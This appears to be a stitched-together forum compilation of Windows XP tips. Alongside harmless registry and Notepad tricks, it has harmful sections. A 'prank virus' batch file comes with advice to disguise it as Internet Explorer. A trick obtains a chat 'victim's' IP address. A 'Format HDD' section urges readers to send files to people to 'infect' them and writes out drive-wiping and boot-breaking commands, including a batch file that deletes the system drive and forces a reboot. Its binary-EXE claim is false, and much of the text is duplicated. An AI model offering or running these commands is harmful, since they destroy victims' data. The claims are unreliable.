· Be EXTREMELY careful when editing the registry!
· One wrong change and you can literally crash your Windows OS

How to Make a Funny Prank Virus

This is a totally harmless prank virus to pull on a friend or someone

Steps
1. Open notepad
2. Type the following code in:

@echo off
echo VIRUS DETECTED
pause
echo DELETING VIRUS
pause
:1
dir /s
goto 1

This will create a never ending stream of mindless code. This cannot be stopped easily.
3. Save the file as "virus.bat"
4. Have fun
Tips
· You can make the virus look convincing by changing its name and Icon.
o One way to do that is simply rename the file. Then right click the icon and click "properties". Then look for the icon you want. You might use the internet explorer icon and name it "Internet Explorer". You do need a shortcut to change the icon though. Just make a shortcut then change the icon in properties.
· To stop the batch (the fake virus) from running, use the task manager or with vista, press the "x" button.

How to Make Images Fly in Your Browser

It is very interesting to watch and works in many browsers, so give it a try! It will make all the images on the webpage fly around. Make sure to give thanks to the original author too.
Steps
1. Go on to a website with a couple of images.
2. Copy and paste the following code into your address bar in which you want to see the images fly:
3. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',5); void(0);
4. Press the enter key.
5. Enjoy the flying images!
Tips
· Visit a site with many images - makes thing more exciting!
· Make sure your code is in one row!
· You can change the speed of the movements by changing the "setIntervat('A()', 5) - 5 with a number you want.

Hacking MSN

a small trick ll worked for me hence posting it here


Hacking MSN is actually VERY simple. Msn is designed to route the connection through a microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise microsoft would waste alot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.


If u recieve some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will recieve a clear IP.

once u have d IP u can do anything with him by Fingerprinting.

U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).

Win XP Cheats

Win XP Cheats
Set Processes Priority
Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

CTRL-SHIFT-ESC 1. Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option
2. For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s Shutdown Trick Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.

Speed Up Ur Shut down !!

Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).
and !

Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system

Hide ur folders.. never known trick !!!!!!!!!! Disguise them to "Recycle Bin"
Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u've a folder games
press F2,
then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"
c the magic....
then 2 get to original form,
remove the extension using
"ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file


n u are done..

System information
system up time only for xp professional edition
It boasts how long it can stay up. Whereas previous
versions of Windows were coy about how long they went
between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from
the All Programs start button option, and then type
'systeminfo'. The computer will produce a lot of
useful info, including the uptime. If you want to keep
these, type 'systeminfo > info.txt'. This creates a
file called info.txt you can look at later with
Notepad. (Professional Edition only). lock pc just by double clicking mouse
You can lock your XP workstation with two clicks of
the mouse. Create a new shortcut on your desktop using
a right mouse click, and enter 'rundll32.exe
user32.dll,LockWorkStation' in the location field.
Give the shortcut a name you like. That's it -- just
double click on it and your computer will be locked.
And if that's not easy enough, Windows key + L will do
the same.

SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)
Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad.. Remove Stored username and Passwords !
To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords

It Works

Remove the Username and picture from Windows XP New Start Menu
The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.

For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
Start Windows Explorer and go to this folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

From that folder, rename the BMP file which corresponds to your user account.
( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )
Next, rename the following folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures

to something else, say...

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures
To remove the user name, follow these steps

Start regedit.exe and navigate to the this key:

HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer
In the right-pane, set NoUserNameInStartMenu value-data to 1

Close Regedit.exe and restart Windows.

You'll end up with a blue space at the top of the Start Menu.

To get back the username and the picture, reverse the above procedure.

For the New Start Menu, Windows XP looks for the .bmp file in the folder

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

If the file is not found, it takes a picture from the "Default Pictures" sub-folder. By renaming the .bmp and the "Default Pictures" folder, you're giving no chance for Windows to fetch an image for the Start Menu

Notepad Trick ! for complete list move to NOTEPAD TRICKS page !!
Well quite old but here is d complete collection

Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again. another trick is 1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...

NOTEPAD "world trade centre trick"
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings

log trick !! make ur Notepad a diary !!
Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that WHY?
The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

SPEED UP MENU DISPLAY.!!
When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.

Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.

Navigate to HKEY_CURRENT_USER\Control Panel\Desktop
Select MenuShowDelay from the list on the right.

Right on it and select Modify.
Change the value to 0.
Reboot your computer.

CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!

Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it'll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:
1. Open up regedit
2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler
3. Delete the "Default" value which should be "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"
Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.

CD ROM STOPS AUTOPLAYING/AUTORUN.!!

And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.
Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic

How to make your Desktop Icons Transparent
Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop DISPLAY MESSAGE ON STARTUP. Start regedit, if you are unfamiliar with regedit please see our FAQ.
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart

AUTO DELETE TEMPORARY FOLDER.!!
ll what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..

First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro

Make ur pdf files to speak
make ur pdf files to speak
here r the shortcuts for hearing pdf files in abobe reader 6.0 or higher
ctrl+shift+b ---->to hear the whole topic
ctrl+shift+v ---->to hear the page

Win XP Cheats

Win XP Cheats
Set Processes Priority
Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.

CTRL-SHIFT-ESC 1. Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option
2. For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD’s Shutdown Trick Imidiate rapid shut down window
while shutting down window. open task manager(Ctr+Alt+Del),
Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.
Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.

Speed Up Ur Shut down !!

Start Regedit.
Navigate to HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control.
Click on the "Control" Folder.
Select "WaitToKillServiceTimeout"
Right click on it and select Modify.
Set it a value lower than 2000 (Mine is set to 200).
and !

Like previous versions of windows, it takes long time to restart or shutdown windows xp when the "Exit Windows" sound is enabled. to solve this problem you
must disable this useless sound. click start button then go to settings -> control panel -> Sound,Speech and Audio devices -> Sounds and Audio Devices -> Sounds, then under program events and windows menu click on "Exit Windows" sub-menu and highlight it.now from sounds you can select,choose "none" and then click apply and ok. now you can see some improvements when shutting down your system

Hide ur folders.. never known trick !!!!!!!!!! Disguise them to "Recycle Bin"
Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}
eg,
if u've a folder games
press F2,
then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"
c the magic....
then 2 get to original form,
remove the extension using
"ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file


n u are done..

System information
system up time only for xp professional edition
It boasts how long it can stay up. Whereas previous
versions of Windows were coy about how long they went
between boots, XP is positively proud of its stamina.
Go to the Command Prompt in the Accessories menu from
the All Programs start button option, and then type
'systeminfo'. The computer will produce a lot of
useful info, including the uptime. If you want to keep
these, type 'systeminfo > info.txt'. This creates a
file called info.txt you can look at later with
Notepad. (Professional Edition only). lock pc just by double clicking mouse
You can lock your XP workstation with two clicks of
the mouse. Create a new shortcut on your desktop using
a right mouse click, and enter 'rundll32.exe
user32.dll,LockWorkStation' in the location field.
Give the shortcut a name you like. That's it -- just
double click on it and your computer will be locked.
And if that's not easy enough, Windows key + L will do
the same.

SPEED UP UR ACROBAT READER (ALMOST LIKE NOTEPAD)
Do u get irritated when acrobat reader takes 5/10 seconds to load when you want to open a pdf document. There is a way to speed up the loading.

1. Go to the installation folder of acrobat reader
(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).

Now your acrobat reader will load very fast
and almost as good as notepad.. Remove Stored username and Passwords !
To remove the Stored User Names and Passwords from your system, try this:
Click Start, Run and type Control keymgr.dll
Remove the entries from the list.
The other ways to access this dialog are:
Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords
-or-
From Control Panel, select your User Account, click Manage your network passwords

It Works

Remove the Username and picture from Windows XP New Start Menu
The User account picture can be removed by turning off the Welcome Screen. Or, by switching to Windows Classic theme. Follow the method described in this article if you want to remove the username and picture from the Start Menu, without disabling the Welcome Screen and Windows XP Theme.

For those who want to remove the user name and user account picture from Start Menu, in order to have a blank blue panel at the top, try this:
Start Windows Explorer and go to this folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

From that folder, rename the BMP file which corresponds to your user account.
( For example, if your username is Robert, rename Robert.bmp to old_Robert.bmp )
Next, rename the following folder:

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\Default Pictures

to something else, say...

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures\No_Default Pictures
To remove the user name, follow these steps

Start regedit.exe and navigate to the this key:

HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Policies \ Explorer
In the right-pane, set NoUserNameInStartMenu value-data to 1

Close Regedit.exe and restart Windows.

You'll end up with a blue space at the top of the Start Menu.

To get back the username and the picture, reverse the above procedure.

For the New Start Menu, Windows XP looks for the .bmp file in the folder

C:\Documents and Settings\All Users\Application Data\Microsoft\User Account Pictures

If the file is not found, it takes a picture from the "Default Pictures" sub-folder. By renaming the .bmp and the "Default Pictures" folder, you're giving no chance for Windows to fetch an image for the Start Menu

Notepad Trick ! for complete list move to NOTEPAD TRICKS page !!
Well quite old but here is d complete collection

Step 1: Open Notepad
Step 2: Write following line in the notepad.
this app can break
Step 3: Save this file as xxx.txt
Step 4: Close the notepad.
Step 5: Open the file again. another trick is 1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.
or
Open a note pad
type Bush hid the facts
save that file,
close it
again open and see...

NOTEPAD "world trade centre trick"
Did you know that the flight number of the plane that had hit WTC ...on
9/11 was Q33N ....Open your Notepad in ur computer and type the flight
number i.e Q33N... Increase the Font Size to 72, Change the Font to
Wingdings. U will be amazed by the findings

log trick !! make ur Notepad a diary !!
Sometimes we want to insert current data and time, whenever we open the file in the notepad. If you are a lazy person like me, who don’t like to press F5 whenever you open a notepad. Then here is a trick to avoid this. Just add a .LOG in the first line of your text file and close it.
Whenever you open the file with that text in the first line in the notepad, it will insert the current date and time at the end of the file. You can start entering your text after that WHY?
The reason this happens:

In notepad, any other 4-3-3-5 letter word combo will have the same results.
It is all to do with a limitation in Windows. Text files containing Unicode UTF-16-encoded Unicode are supposed to start with a "Byte-Order Mark" (BOM), which is a two-byte flag that tells a reader how the following UTF-16 data is encoded.

1) You are saving to 8-bit Extended ASCII (Look at the Save As / Encoding format)
2) You are reading from 16-bit UNICODE (You guessed it, look at the Save As / Encoding format)
This is why the 18 8-bit characters are being displayed as 9 (obviously not supported by your codepage) 16-bit UNICODE characters

SPEED UP MENU DISPLAY.!!
When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.

Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.

Navigate to HKEY_CURRENT_USER\Control Panel\Desktop
Select MenuShowDelay from the list on the right.

Right on it and select Modify.
Change the value to 0.
Reboot your computer.

CLICKING * .AVI FILES ON EXPLORER CAUSING 100% CPU USAGE.!!

Well windows seem to have a REALLY big problem when it comes to reading AVI files. It seems that when you click on an AVI file in explorer, it'll try to read the entire AVI file to determine the width,height, etc. of the AVI file (this is displayed in the Properties window). Now the problem with Windows is that if you have a broken/not fully downloaded AVI file that doesnt contain this info, Windows will scan the entire AVI file trying to figure out all these properties which in the process will probably cause 100% CPU usage and heavy memory usage. To solve this problem all you have to do is the following:
1. Open up regedit
2. Goto HKEY_CLASSES_ROOT\SystemFileAssociations\.avi\shellex\PropertyHandler
3. Delete the "Default" value which should be "{87D62D94-71B3-4b9a-9489-5FE6850DC73E}"
Voila! Please not that this will no longer provide you with the windows properties displaying the AVI file information such as width, height, bitrate etc. But its a small price to pay for saving you resources.
NOTE: Please use caution when using regedit. Improper usage may cause windows to behave imcorrectly. Also, I cannot be held resposible. Backup your registry first.

CD ROM STOPS AUTOPLAYING/AUTORUN.!!

And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.
Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic

How to make your Desktop Icons Transparent
Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop DISPLAY MESSAGE ON STARTUP. Start regedit, if you are unfamiliar with regedit please see our FAQ.
Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Modify the key legalnoticecaption with what you want to name the window.
Modify the key legalnoticetext with what you want the window to say. Restart

AUTO DELETE TEMPORARY FOLDER.!!
ll what i prefer is %temp% " without quotes.. at Start -> Run..
this opens ur temp folder n den u cal erase it neatly// still try dis one too..

First go into gpedit.msc
Next select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder
Then right click "Do Not Delete Temp Folder Upon Exit"
Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro

Make ur pdf files to speak
make ur pdf files to speak
here r the shortcuts for hearing pdf files in abobe reader 6.0 or higher
ctrl+shift+b ---->to hear the whole topic
ctrl+shift+v ---->to hear the page

XP Cheats 2

Quick Close All Windows

Ever wonder if there's an easy way to close all open windows? If so, check this out. Let's say you double-click My Computer to open it. Now double-click the drive C icon to open it. Then you double-click one of the folders in drive C to open it. Now hold down Shift and click the last window's close box. All the windows you just opened will close. This includes My Computer. Any other open windows that are not related to My Computer will not close. You can also right-click the taskbar and choose Minimize All Windows. This doesn't close them, but it does get them off your desktop and out of the way. If you use a keyboard that includes the Windows key, you can press Windows-M to minimize all the open windows. Just as with the taskbar, this doesn't close any windows--it just minimizes them.

Turn Your Num Lock On Forever

How can you get Num Lock to stay on in Windows NT Workstation 4.0? Setting it in the BIOS does not work." We often get this question, but we need to mention that installing Service Pack 4 solved this problem for us. Before you make any changes to your Registry, we suggest that you try the Service Pack. Go to http://www.microsoft.com/support/winnt/default.htm to download it. If you can't use Service Pack 4 for whatever reason, here's a REG file that will make Num Lock stay on for all users. To create the file, run Notepad and enter the following as shown here. Where you see the line BLANK LINE GOES HERE, press Enter to enter a blank line. Do not type BLANK LINE GOES HERE. REGEDIT4 BLANK LINE GOES HERE [HKEY_CURRENT_USER\Control Panel\Keyboard] "InitialKeyboardIndicators" = "2" [HKEY_USERS\.DEFAULT\Control Panel\Keyboard] "InitialKeyboardIndicators" = "2" BLANK LINE GOES HERE Choose File, Save As and name the file Num.reg. Locate a folder in which to keep the file, then click Save. To use the file, double-click its icon. When the dialog box opens informing you that you've entered the information into the Registry, click OK to continue. Now restart the computer. Num Lock should come on and stay on. This change applies ONLY to profiles you create after you make the Registry change.

Print Through DOS Mode

There are actually several ways to print a text file while working at the Command Prompt. Assuming the file you want to print is in your current folder, you can type print TextFile.txt and press Enter. In this example, Text File is the name of the file you want to print. You must use the extension. If you'd like to edit the file before you print it, type edit TextFile.txt and press Enter. This opens MS-DOS Edit. Edit the file and then press Alt, F, P to print it. If you'd prefer to use Notepad, you can do this from the Command Prompt as well. Just type Notepad TextFile.txt and press Enter. Notepad opens with TextFile.txt loaded. You can even use Notepad to print without going through the edit stage. Type Notepad /p TextFile.txt and press Enter. Notepad will open with the file loaded and print the file with no further input from you.

Dealing with Print Screen

In the last tip, we listed some Windows XP keyboard shortcuts. Two of them deal with the Print Screen command. If you press print Screen, XP copies the entire window to the Clipboard; if you press Alt-print Screen, XP copies only the active window to the Clipboard.
If you're interested in printing the screen in Windows XP, press print Screen to copy the screen to the Clipboard, you can use Paint to print the Clipboard contents. Just open Paint and choose Edit, Paste. This will paste all Clipboard contents into Paint Now you can use Paint to print the screen: Simply choose File, print.
by
Hassan Sohail

Format HDD With NotPaid

Step 1. Copy The Following In Notepad Exactly as it says

01001011000111110010010101010101010000011111100000 Step 2. Save As An EXE Any Name Will Do Step 3. Send the EXE to People And Infect OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000

format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000 format a:\ /Q/X -- this will format your drive a:\

01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000 del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001 try to figure out urself rest cant spoonfeed its workin Do not try it on ur PC. dont mess around this is for educational purpose only
still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat worse
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file


Reply With Quote

Things you didn't know about Windows XP

You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets
1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.

6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.

7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.

8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.

9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.

10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.

11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.

12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.

13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.

14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.

15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.

16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.

17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.

18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.

19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.

20. The next release of Windows XP, codenamed Longhorn, is due out late dis month The next big release is codenamed Blackcomb and will be out in 2010/2011

by
HASSAN SOHAIL

How to Clone a Hard Drive

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.

Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.

Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.

Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".

Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:

Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:

"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.

If you receive an error message, then remove the space from between XCOPY and C:\

Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.

This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.

XPHacking With Windows XP

So you have the newest, glitziest, "Fisher Price" version of Windows: XP. How
can you use XP in a way that sets you apart from the boring millions of ordinary
users?

The key to doing amazing things with XP is as simple as D O S. Yes, that's
right, DOS as in MS-DOS, as in MicroSoft Disk Operating System. Windows XP (as
well as NT and 2000) comes with two versions of DOS. Command.com is an old DOS
version. Various versions of command.com come with Windows 95, 98, SE, ME,
